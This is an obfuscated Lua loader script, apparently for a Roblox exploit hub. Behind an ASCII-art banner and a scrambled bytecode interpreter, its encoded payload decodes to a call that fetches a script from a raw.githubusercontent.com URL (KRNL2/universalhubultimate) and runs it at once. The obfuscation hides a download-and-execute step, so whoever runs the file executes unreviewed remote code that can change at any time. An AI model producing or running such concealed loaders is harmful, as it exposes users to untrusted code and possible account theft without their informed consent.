
--[[
 
███╗░░░███╗██████╗░██████╗░██╗░░░██╗██╗░░░░░██╗░░░░░███████╗██████╗░░█████╗░░██████╗░
████╗░████║██╔══██╗██╔══██╗██║░░░██║██║░░░░░██║░░░░░██╔════╝██╔══██╗██╔══██╗██╔════╝░
██╔████╔██║██████╔╝██████╦╝██║░░░██║██║░░░░░██║░░░░░█████╗░░██████╔╝██║░░██║██║░░██╗░
██║╚██╔╝██║██╔══██╗██╔══██╗██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██╔══██╗██║░░██║██║░░╚██╗
██║░╚═╝░██║██║░░██║██████╦╝╚██████╔╝███████╗███████╗██║░░░░░██║░░██║╚█████╔╝╚██████╔╝
╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═════╝░░╚═════╝░╚══════╝╚══════╝╚═╝░░░░░╚═╝░░╚═╝░╚════╝░░╚═════╝░
 
]]--
 
do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then local v60=0;while true do if (v60==0) then v18=v0(v3(v29,1,1));return "";end end else local v61=v2(v0(v29,16));if v18 then local v70=v5(v61,v18);v18=nil;return v70;else return v61;end end end);local function v19(v30,v31,v32)if v32 then local v62=0 -0;local v63;while true do if (v62==0) then v63=(v30/(2^(v31-(1 + 0))))%(((1 + 1) -0)^(((v32-(1959 -(120 + 1838))) -(v31-(667 -(554 + 112)))) + (1595 -(1198 + (1692 -(1079 + 217))))));return v63-(v63%(2 -1));end end else local v64=((420 -(181 + 51)) -(119 + 67))^(v31-(4 -3));return (((v30%(v64 + v64))>=v64) and (1432 -(1125 + 306))) or (0 + (615 -(28 + 587)));end end local function v20()local v37=v1(v15,v17,v17);v17=v17 + 1;return v37;end local function v21()local v38,v39=v1(v15,v17,v17 + (514 -(214 + 298)));v17=v17 + 2;return (v39 * (765 -(360 + 149))) + v38;end local function v22()local v40,v41,v42,v43=v1(v15,v17,v17 + 3);v17=v17 + ((788 + 162) -(349 + 597));return (v43 * (16778427 -(15 + 1196))) + (v42 * (111652 -46116)) + (v41 * (534 -278)) + v40;end local function v23()local v44=v22();local v45=v22();return (( -(2 + 0) * v19(v45,32)) + (1398 -(502 + 155 + 740))) * (((1 -0) + 1)^(v19(v45,9 + 12,112 -81) -((1930 -(268 + 738)) + 99))) * ((((v19(v45,1062 -(102 + 959),12 + 8) * (((1226 -(44 + 699)) -((594 -333) + 220))^(583 -((200 -139) + 490)))) + v44)/((5 -3)^(19 + 33))) + ((2 + 0) -1));end local function v24(v33)local v46=(3635 -(300 + 1406)) -(164 + 1765);local v47;local v48;while true do if (v46==3) then return v6(v48);end if (v46==(2 -1)) then v47=v3(v15,v17,(v17 + v33) -(1 + 0));v17=v17 + v33;v46=1383 -((1165 -661) + 877);end if (v46==(0 + 0)) then v47=nil;if  not v33 then v33=v22();if (v33==(0 -0)) then return "";end end v46=1 + (0 -0);end if (v46==(1713 -(171 + 1540))) then v48={};for v71=1 + 0 + 0, #v47 do v48[v71]=v2(v1(v3(v47,v71,v71)));end v46=3;end end end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v49=0;local v50;local v51;local v52;local v53;local v54;local v55;while true do local v59=0;while true do if (v59~=1) then else if (v49==2) then local v88=0;while true do if (v88~=0) then else for v98=399 -(185 + 213),v54 do local v99=0;local v100;local v101;local v102;local v103;while true do if (v99==(415 -(134 + 281))) then v100=0;v101=nil;v99=1 + 0;end if (v99~=(1 -0)) then else v102=nil;v103=nil;v99=2;end if (v99==(3 -1)) then while true do if (v100==(1480 -(801 + 678))) then v103=nil;while true do if (v101==1) then if (v102==(1 -0)) then v103=v20()~=0;elseif (v102==2) then v103=v23();elseif (v102~=3) then else v103=v24();end v55[v98]=v103;break;end if (v101==0) then local v140=1113 -(882 + 231);local v141;while true do if (v140~=(949 -(674 + 275))) then else v141=0;while true do if ((0 + 0)==v141) then local v156=0 -0;local v157;while true do if ((0 -0)~=v156) then else v157=0;while true do if (v157~=0) then else local v164=0;while true do if (v164~=0) then else v102=v20();v103=nil;v164=1;end if (v164==(1 -0)) then v157=1 + 0;break;end end end if (v157==(1716 -(769 + 946))) then v141=359 -(196 + 162);break;end end break;end end end if (v141==(1 + 0)) then v101=1 + 0;break;end end break;end end end end break;end if (v100==(0 + 0)) then local v129=0;local v130;while true do if (v129~=(0 -0)) then else v130=1765 -(1621 + 144);while true do if ((516 -(377 + 138))~=v130) then else v100=3 -2;break;end if ((0 + 0)~=v130) then else local v145=0 -0;while true do if (v145~=(117 -(112 + 4))) then else v130=3 -2;break;end if (v145==0) then v101=0;v102=nil;v145=1;end end end end break;end end end end break;end end end v53[11 -8]=v20();v88=1 + 0;end if (v88==1) then for v104=1346 -(1220 + 125),v22() do local v105=0 -0;local v106;local v107;while true do if (v105==1) then while true do if (v106~=0) then else v107=v20();if (v19(v107,1 -0,4 -3)==(122 -(74 + 48))) then local v134=0 + 0;local v135;local v136;local v137;local v138;while true do if (v134~=(1 + 1)) then else while true do if (v135==(692 -(460 + 229))) then if (v19(v137,5 -2,3)==(1860 -(1367 + 492))) then v138[4]=v55[v138[4]];end v50[v104]=v138;break;end if ((0 + 0)~=v135) then else local v150=0;while true do if (v150~=1) then else v135=1045 -(704 + 340);break;end if ((0 -0)==v150) then v136=v19(v107,2,3);v137=v19(v107,4,1164 -(327 + 831));v150=1;end end end if (v135==2) then local v151=0 + 0;while true do if (v151==(528 -(201 + 327))) then if (v19(v137,1,1)~=1) then else v138[2]=v55[v138[2]];end if (v19(v137,1 + 1,2)==(1 + 0)) then v138[3]=v55[v138[3]];end v151=1;end if (v151==(1 + 0)) then v135=3 + 0;break;end end end if (v135==(1129 -(70 + 1058))) then local v152=0 + 0;while true do if (v152~=(0 -0)) then else local v160=0;while true do if (v160~=(1417 -(875 + 541))) then else v152=4 -3;break;end if (v160~=0) then else v138={v21(),v21(),nil,nil};if (v136==(0 + 0)) then local v165=0;local v166;while true do if (v165==0) then v166=903 -(297 + 606);while true do if (v166~=(1709 -(848 + 861))) then else v138[3]=v21();v138[2 + 2]=v21();break;end end break;end end elseif (v136==(1 -0)) then v138[2 + 1]=v22();elseif (v136==2) then v138[7 -4]=v22() -(2^(44 -(18 + 10)));elseif (v136==3) then local v171=0;local v172;local v173;local v174;while true do if ((2 -1)==v171) then v174=nil;while true do if (v172==(1398 -(748 + 650))) then v173=0 + 0;v174=nil;v172=1 + 0;end if (v172==(1 + 0)) then while true do if (v173==(0 + 0)) then v174=0 -0;while true do if (v174~=(1167 -(230 + 937))) then else v138[1247 -(556 + 688)]=v22() -((7 -5)^16);v138[15 -11]=v21();break;end end break;end end break;end end break;end if (v171==0) then v172=1748 -(1265 + 483);v173=nil;v171=1;end end end v160=1 + 0;end end end if (v152~=1) then else v135=2;break;end end end end break;end if (v134==0) then local v144=0 + 0;while true do if (v144==0) then v135=0;v136=nil;v144=1279 -(978 + 300);end if (v144~=(1678 -(985 + 692))) then else v134=1 + 0;break;end end end if (v134~=(1 + 0)) then else v137=nil;v138=nil;v134=2;end end end break;end end break;end if (v105~=0) then else local v112=0;while true do if (v112~=0) then else v106=0 -0;v107=nil;v112=833 -(590 + 242);end if (v112==(1 + 0)) then v105=1 + 0;break;end end end end end v49=1 + 2;break;end end end if (v49~=0) then else local v89=907 -(555 + 352);local v90;while true do if (v89~=(0 -0)) then else v90=13 -(12 + 1);while true do if (v90~=0) then else v50={};v51={};v90=1356 -(553 + 802);end if (v90==(1 -0)) then v52={};v49=1;break;end end break;end end end break;end if (v59~=0) then else if (v49~=3) then else local v91=0 + 0;while true do if (0~=v91) then else for v108=1 + 0,v22() do v51[v108-1]=v27();end for v110=1,v22() do v52[v110]=v22();end v91=1;end if (v91==1) then return v53;end end end if (v49~=(3 -2)) then else local v92=0;while true do if (v92==1) then v55={};v49=2;break;end if (v92~=(0 -0)) then else local v97=0 -0;while true do if (v97~=0) then else v53={v50,v51,nil,v52};v54=v22();v97=1;end if (v97==(1419 -(1295 + 123))) then v92=1391 -(210 + 1180);break;end end end end end v59=1;end end end end local function v28(v34,v35,v36)local v56=v34[1];local v57=v34[2];local v58=v34[3];return function(...)local v65=1;local v66= -1;local v67={...};local v68=v11("#",...) -1;local function v69()local v73=v56;local v74=Const;local v75=v57;local v76=v58;local v77=v26;local v78={};local v79={};local v80={};for v86=0 + 0,v68 do if (((45 + 177)<(2433 + (2868 -(616 + 136)))) and (v86>=v76)) then v78[v86-v76]=v67[v86 + (1 -0)];else v80[v86]=v67[v86 + (1797 -(440 + 1356))];end end local v81=(v68-v76) + (1413 -(319 + 1093));local v82;local v83;while true do local v87=0 + 0;while true do if ((v87==(1 + 0)) or ((17446 -13037)<=(4910 -(1036 + 268)))) then if (((2766 -(43 + 1527))<(5589 -1313)) and (v83<=(1875 -(243 + 1629)))) then if (((88 + 361)==449) and (v83<=((2334 -(54 + 1854)) -(165 + (1997 -(257 + 1480)))))) then if ((v83>(0 + 0)) or ((4607 -2959)>(665 + 2384))) then v80[v82[560 -(237 + 321)]]=v82[1 + 2]~=(0 + 0);else v80[v82[2 + 0]]();end elseif ((v83>(6 -4)) or ((3335 -(793 + 193))>(8611 -6174))) then v80[v82[3 -1]]=v82[3 -0];else local v115=0 -0;local v116;local v117;while true do if (((0 -0)==v115) or (4982<(6483 -4753))) then v116=878 -((109 -39) + 808);v117=nil;v115=918 -(81 + 836);end if ((v115==(1 + 0)) or (((20302 -(125 + 200)) -15647)==(5285 -(460 + 1113)))) then while true do if (((2655 -(568 + 892))<=(6684 -(80 + 1905))) and (v116==(300 -(287 + 13)))) then v117=v82[3 -1];v80[v117]=v80[v117](v12(v80,v117 + (34 -(25 + 8)),v66));break;end end break;end end end elseif ((((506 + 2619) -2274)<1849) and (v83<=(4 + 1))) then if ((v83>(8 -4)) or ((645 + 378)>(2589 + (2141 -(400 + 135))))) then local v118=0 -0;local v119;local v120;local v121;local v122;local v123;local v124;while true do if ((v118==(0 + 0)) or ((3361 -(107 + 15 + 4))<=(3629 -(411 + 571 + 33)))) then v119=672 -(598 + 74);v120=nil;v118=824 -(757 + 66);end if ((v118==(1090 -(770 + 319))) or ((2291 -(1053 + 76))<(124 + 409))) then v121=nil;v122=nil;v118=2 -0;end if (((2632 -(762 + 83))<(5890 -(1610 + 251))) and (v118==(1 + 1 + 0))) then v123=nil;v124=nil;v118=1 + 2;end if (((1820 -(995 + 654))<=((12757 -5222) -4762)) and (v118==(1051 -(569 + 479)))) then while true do if ((v119==(1 + 0 + 1)) or ((830 + 230)>(6386 -3196))) then v124=nil;while true do if (((1754 + 22 + 29)<=(4524 -(374 + 990))) and (v120==(0 -0))) then local v146=0;local v147;while true do if ((((2896 -(121 + 57)) + 1734)>3913) and (v146==(0 + 0))) then v147=0 -0;while true do if ((v147==(1 + (1619 -(660 + 959)))) or ((399 + 3084)<=894)) then v120=1 + 0;break;end if ((v147==(0 + 0)) or (4321>=((3717 + 12291) -11485))) then v121=v82[1307 -(560 + 745)];v122,v123=v77(v80[v121](v12(v80,v121 + 1 + 0,v82[2 + 1 + 0])));v147=1 + 0;end end break;end end end if (((1287 + 3314)==(6481 -(214 + 1666))) and (v120==(649 -(112 + 535)))) then for v153=v121,v66 do local v154=0 -0;local v155;while true do if (((2845 -((3121 -(1121 + 629)) + 305))<=(2595 -(239 + 119))) and ((1175 -(554 + 621))==v154)) then v155=0 + 0;while true do if (((333 + 69)<=((2320 -(28 + 1504)) -(228 + 35))) and (v155==(1529 -(1301 + 228)))) then v124=v124 + (2 -1);v80[v153]=v122[v124];break;end end break;end end end break;end if ((((4691 + 1780) -(1514 + 288))>=(11473 -6853)) and (v120==(1 + (1880 -(1480 + 400))))) then local v148=0 -0;while true do if ((((3850 + 498) -1164)<=(392 + 3922)) and (v148==(491 -(317 + 173)))) then v120=(825 -(321 + 502)) + 0;break;end if ((v148==(0 + 0)) or ((271 + 535)<(439 + (1633 -(297 + 1154))))) then local v159=(1144 -(10 + 1134)) -0;while true do if ((v159==(0 + 0)) or ((116 + 3766)>(1807 + 2937))) then v66=(v123 + v121) -(1 -0);v124=0 + 0;v159=145 -(86 + 58);end if (((1576 -(1454 + 121))==v159) or ((972 + 526)<=(532 + 219))) then v148=1 + 0;break;end end end end end end break;end if (((1495 + 2806)>2856) and (v119==(0 -0))) then local v143=1614 -(781 + 271 + 562);while true do if ((v143==(0 + 0)) or ((6242 -(2477 + 343))<(3988 -(120 + 1046)))) then v120=1431 -(729 + 702);v121=nil;v143=1 -0;end if (((1938 -(349 + 117))>(1563 -1184)) and (v143==(1 + 0))) then v119=1 + 0;break;end end end if ((v119==(1404 -(1097 + 306))) or ((60 -37)==3997)) then v122=nil;v123=nil;v119=458 -(413 + (785 -(551 + 191)));end end break;end end else local v125=0 -0;local v126;local v127;while true do if (((2409 + 1560)>=(2245 + 998)) and (v125==(1010 -(574 + 435)))) then v80[v126 + 1 + 0]=v127;v80[v126]=v127[v82[2 + 2]];break;end if (((11889 -9136)<(380 + 1256 + 1660)) and ((0 + 0)==v125)) then local v133=0 -0;while true do if ((v133==(1097 -(395 + 701))) or (3922<(893 + 2136))) then v125=2 -1;break;end if (((4182 -2799)==(3054 -(669 + 1002))) and (v133==(0 -0))) then v126=v82[1 + 1];v127=v80[v82[3 + 0]];v133=1 + 0;end end end end end elseif (((4150 -2231)>=(2798 -(1601 + 314))) and (v83>(3 + 3))) then do return;end else v80[v82[1 + 1]]=v36[v82[(1796 -(1370 + 424)) + 1]];end v65=v65 + 1 + 0;break;end if ((v87==((1161 -(514 + 647)) -(0 + 0))) or (((773 -420) + 586)>=(2284 + 2426))) then local v95=0 -(0 -0);while true do if ((v95==(1 + 0)) or ((177 + 2292)<(2193 -1508))) then v87=(2 -1) + 0;break;end if (((12871 -8608)==4263) and (v95==((0 -0) -0))) then v82=v73[v65];v83=v82[1 + 0];v95=1746 -(1558 + 187);end end end end end end A,B=v26(v10(v69));if  not A[1] then local v84=0;local v85;while true do if (0==v84) then v85=v34[4][v65] or "?";error("Script error at ["   .. v85   .. "]:"   .. A[2]);break;end end else return v12(A,2,B);end end;end return v28(v27(),{},v16)();end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403493O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B524E4C322F756E6976657273616C687562756C74696D6174652F6D61696E2F7570646174653100093O0012063O00013O001206000100023O002004000100010003001203000300044O0001000400014O0005000100044O00025O00026O000100012O00073O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v8());end
